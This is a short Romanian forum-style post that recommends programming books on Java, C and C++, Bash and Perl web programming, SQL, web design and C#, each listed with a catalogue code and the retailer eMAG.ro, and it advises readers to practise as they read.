Pot sa va recomand ceva? Se numesc "car?i". Java de la 0 la expert (Necartonat) - Stefan Tanasa, Cristian Olaru, Stefan Andrei POL978-973-46-2405-8 - eMAG.ro Totul despre C si C++ manualul fundamental de programare in C si C++ - Kris Jamsa, Lars Klander TEO973-601-911-X - eMAG.ro C++ introducere in standard template library ALL973-571-798-8 - eMAG.ro Programare web in Bash si Perl - Sabin Buraga, Victor Tarhon-Onu, Stefan Tanasa POL973-683-931-1 - eMAG.ro Sql - Marin Fotache POL973-683-709-2 - eMAG.ro Tehnici De Web Design MCO973-000-000-19 - eMAG.ro Limbajul C# pentru incepatori - Notiuni de baza - Liviu Negrescu, Lavinia Negrescu ALB973-650-153-1 - eMAG.ro Secrete C++ - Constantin Galatan ALB973-650-186-8 - eMAG.ro Si sunt foarte multe, foarte detaliate, va garantez ca veti intelege. Este de preferat sa si aplicati pe masura ce cititi ceea ce gasiti prin ele.